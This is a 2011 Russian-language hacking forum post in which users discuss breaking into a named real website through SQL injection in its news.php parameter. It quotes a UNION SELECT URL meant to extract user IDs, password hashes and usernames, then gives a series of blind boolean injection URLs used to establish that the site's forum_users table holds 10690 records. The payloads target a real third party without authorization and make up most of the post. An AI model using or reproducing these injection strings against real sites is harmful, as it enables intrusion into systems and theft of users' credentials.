13.10.2011, 08:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от OxoTnik
когда лезешь дальше, сайт отвергает мой запросы
Но там есть форум phpBB, тоесть можно просто на угад вытащить типа
Код:
http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat_ws%280x3a,user_id,user _password, username%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16 +from+phpbb_users--
Сорри за небольшой флуд, НО...
Уважаемый, на каких предположениях Вы говорите, что там есть вышесцитированная таблица, если вам режет все запросы хостер ? Пальцем в небо ??
В случае, когда хостер блокирует запросы, нам ничего не мешает применять метод слепой инъекции и орудовать полученными данными.
Нет там никакой таблички phpbb_users, зато есть forum_users
Даже скажу больше - в табличке forum_users аж 10690 записей.
Судите сами
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),1,1))=49
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),2,1))=48
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),3,1))=54
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),4,1))=57
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),5,1))=48[/COLOR][/COLOR]
|
|
|